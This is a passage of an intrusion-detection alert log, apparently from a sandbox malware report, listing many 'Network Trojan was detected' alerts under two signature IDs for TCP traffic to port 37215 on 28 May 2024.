            SID:2829579
            Source Port:54564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.833996
            SID:2835222
            Source Port:54358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.005245
            SID:2829579
            Source Port:39660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310689
            SID:2835222
            Source Port:32974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.403856
            SID:2829579
            Source Port:41716
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989002
            SID:2835222
            Source Port:47610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.389643
            SID:2835222
            Source Port:52996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777697
            SID:2829579
            Source Port:34678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.911946
            SID:2829579
            Source Port:59046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047318
            SID:2835222
            Source Port:33416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756525
            SID:2829579
            Source Port:55274
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.947554
            SID:2835222
            Source Port:55360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995852
            SID:2835222
            Source Port:39592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.741915
            SID:2829579
            Source Port:59052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.051526
            SID:2829579
            Source Port:45044
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887807
            SID:2835222
            Source Port:42904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.745388
            SID:2835222
            Source Port:54828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909911
            SID:2829579
            Source Port:33260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.261878
            SID:2835222
            Source Port:57160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.945516
            SID:2835222
            Source Port:44634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.222018
            SID:2835222
            Source Port:49402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936316
            SID:2835222
            Source Port:34106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.857924
            SID:2835222
            Source Port:52216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.742414
            SID:2829579
            Source Port:48676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.765374
            SID:2829579
            Source Port:54872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.865572
            SID:2829579
            Source Port:48564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.950289
            SID:2829579
            Source Port:47386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.771516
            SID:2835222
            Source Port:56594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.342037
            SID:2829579
            Source Port:60098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.084235
            SID:2829579
            Source Port:57234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575915
            SID:2835222
            Source Port:49300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854394
            SID:2835222
            Source Port:41030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.005172
            SID:2829579
            Source Port:54244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.424249
            SID:2835222
            Source Port:41056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.871119
            SID:2829579
            Source Port:58556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910091
            SID:2835222
            Source Port:37422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849718
            SID:2829579
            Source Port:41736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.830511
            SID:2835222
            Source Port:60174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.319532
            SID:2835222
            Source Port:45052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.610519
            SID:2829579
            Source Port:34784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954477
            SID:2829579
            Source Port:46462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.772739
            SID:2835222
            Source Port:56994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309452
            SID:2829579
            Source Port:59596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.569312
            SID:2835222
            Source Port:54128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756545
            SID:2835222
            Source Port:51530
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.737028
            SID:2835222
            Source Port:34682
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.552203
            SID:2835222
            Source Port:50552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.729064
            SID:2835222
            Source Port:60874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.734204
            SID:2829579
            Source Port:49276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.019767
            SID:2829579
            Source Port:41646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.380333
            SID:2835222
            Source Port:32996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.470206
            SID:2835222
            Source Port:55216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.187885
            SID:2835222
            Source Port:53356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.715349
            SID:2835222
            Source Port:51214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.451024
            SID:2829579
            Source Port:39360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.831738
            SID:2829579
            Source Port:48298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863687
            SID:2835222
            Source Port:50768
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.012356
            SID:2829579
            Source Port:48394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.756672
            SID:2829579
            Source Port:54140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.990216
            SID:2829579
            Source Port:57676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.293810
            SID:2835222
            Source Port:45698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.635145
            SID:2835222
            Source Port:60628
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.967978
            SID:2835222
            Source Port:51590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.740952
            SID:2829579
            Source Port:37082
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956720
            SID:2835222
            Source Port:51922
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871361
            SID:2829579
            Source Port:57090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.444779
            SID:2835222
            Source Port:45338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.064628
            SID:2835222
            Source Port:44048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.713261
            SID:2829579
            Source Port:48732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.323071
            SID:2835222
            Source Port:47318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849022
            SID:2829579
            Source Port:44016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.574527
            SID:2835222
            Source Port:58856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807231
            SID:2835222
            Source Port:40010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.065895
            SID:2835222
            Source Port:33302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.444858
            SID:2829579
            Source Port:57518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756819
            SID:2829579
            Source Port:36248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.040688
            SID:2835222
            Source Port:36730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020441
            SID:2829579
            Source Port:38890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.802312
            SID:2835222
            Source Port:43798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.394321
            SID:2835222
            Source Port:49588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.737817
            SID:2829579
            Source Port:59504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.070701
            SID:2835222
            Source Port:41140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994093
            SID:2829579
            Source Port:38812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.852804
            SID:2829579
            Source Port:35474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604902
            SID:2835222
            Source Port:32912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.939067
            SID:2835222
            Source Port:37696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.333885
            SID:2835222
            Source Port:56520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.309825
            SID:2829579
            Source Port:33398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069866
            SID:2835222
            Source Port:55252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776680
            SID:2835222
            Source Port:34076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.282900
            SID:2835222
            Source Port:39490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.392370
            SID:2835222
            Source Port:59788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.793529
            SID:2829579
            Source Port:53008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.435770
            SID:2835222
            Source Port:37134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.738354
            SID:2829579
            Source Port:51154
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.989117
            SID:2835222
            Source Port:37106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.508148
            SID:2829579
            Source Port:41158
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.941512
            SID:2835222
            Source Port:34832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809058
            SID:2835222
            Source Port:60744
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.645429
            SID:2829579
            Source Port:46160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.656458
            SID:2835222
            Source Port:52578
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.953070
            SID:2835222
            Source Port:47228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.859701
            SID:2829579
            Source Port:53052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.421898
            SID:2829579
            Source Port:53826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.915552
            SID:2835222
            Source Port:60216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989309
            SID:2829579
            Source Port:51684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.470785
            SID:2829579
            Source Port:48510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.788973
            SID:2829579
            Source Port:54958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777631
            SID:2829579
            Source Port:58664
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.872360
            SID:2829579
            Source Port:33994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.066929
            SID:2829579
            Source Port:38602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.060359
            SID:2835222
            Source Port:38846
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533357
            SID:2835222
            Source Port:50208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.048170
            SID:2835222
            Source Port:49888
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.308384
            SID:2829579
            Source Port:42260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.957047
            SID:2835222
            Source Port:55204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808314
            SID:2835222
            Source Port:46928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.562613
            SID:2829579
            Source Port:54082
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.945014
            SID:2835222
            Source Port:54236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.836969
            SID:2835222
            Source Port:59074
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869800
            SID:2835222
            Source Port:40688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.070352
            SID:2829579
            Source Port:48662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.804040
            SID:2829579
            Source Port:34734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.300030
            SID:2829579
            Source Port:44938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.563741
            SID:2835222
            Source Port:38318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.817724
            SID:2829579
            Source Port:46464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.384429
            SID:2835222
            Source Port:44092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.843023
            SID:2829579
            Source Port:60836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.382760
            SID:2835222
            Source Port:56610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.751303
            SID:2835222
            Source Port:35488
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.610127
            SID:2835222
            Source Port:58430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.377440
            SID:2829579
            Source Port:45134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.041553
            SID:2829579
            Source Port:59938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.925127
            SID:2829579
            Source Port:44326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:09.983638
            SID:2835222
            Source Port:50830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.546210
            SID:2835222
            Source Port:36572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.924907
            SID:2835222
            Source Port:49344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.918770
            SID:2835222
            Source Port:55354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.311543
            SID:2835222
            Source Port:35762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.313834
            SID:2829579
            Source Port:35924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854721
            SID:2835222
            Source Port:44794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855272
            SID:2829579
            Source Port:38110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.811653
            SID:2835222
            Source Port:50424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.323312
            SID:2835222
            Source Port:42098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.873516
            SID:2829579
            Source Port:40830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804770
            SID:2835222
            Source Port:37098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930139
            SID:2829579
            Source Port:49506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069627
            SID:2829579
            Source Port:48382
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.953473
            SID:2835222
            Source Port:42006
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.476010
            SID:2829579
            Source Port:49096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.843912
            SID:2829579
            Source Port:52320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.060129
            SID:2829579
            Source Port:47366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735801
            SID:2829579
            Source Port:50390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968380
            SID:2835222
            Source Port:43568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575930
            SID:2835222
            Source Port:40032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.994866
            SID:2829579
            Source Port:54000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.816731
            SID:2835222
            Source Port:54302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.661512
            SID:2829579
            Source Port:35996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.901469
            SID:2829579
            Source Port:42736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.436438
            SID:2829579
            Source Port:39488
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.865017
            SID:2835222
            Source Port:58490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910757
            SID:2829579
            Source Port:45054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.078529
            SID:2835222
            Source Port:53500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.895105
            SID:2829579
            Source Port:40140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.596853
            SID:2829579
            Source Port:60254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837285
            SID:2829579
            Source Port:47452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.911992
            SID:2835222
            Source Port:32804
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.943643
            SID:2835222
            Source Port:39962
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290881
            SID:2835222
            Source Port:55618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.746540
            SID:2829579
            Source Port:34252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.811078
            SID:2835222
            Source Port:43732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.020127
            SID:2829579
            Source Port:45396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.086439
            SID:2829579
            Source Port:38424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956467
            SID:2835222
            Source Port:47886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995624
            SID:2829579
            Source Port:51366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.004711
            SID:2835222
            Source Port:33974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.084607
            SID:2829579
            Source Port:43998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.713514
            SID:2835222
            Source Port:56582
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.773817
            SID:2829579
            Source Port:45624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848277
            SID:2829579
            Source Port:49530
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.291247
            SID:2835222
            Source Port:58116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869333
            SID:2829579
            Source Port:37120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.967795
            SID:2835222
            Source Port:58190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879597
            SID:2829579
            Source Port:39740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.230965
            SID:2835222
            Source Port:52104
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777674
            SID:2829579
            Source Port:34430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.943157
            SID:2829579
            Source Port:55646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.931600
            SID:2829579
            Source Port:39242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.941956
            SID:2829579
            Source Port:39136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.374557
            SID:2829579
            Source Port:51642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.849369
            SID:2829579
            Source Port:37848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321192
            SID:2835222
            Source Port:45730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.469891
            SID:2835222
            Source Port:44638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.507091
            SID:2829579
            Source Port:60522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.731002
            SID:2829579
            Source Port:32844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.058729
            SID:2835222
            Source Port:57834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.825533
            SID:2835222
            Source Port:42134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.733651
            SID:2835222
            Source Port:58882
            Destination Port:37215
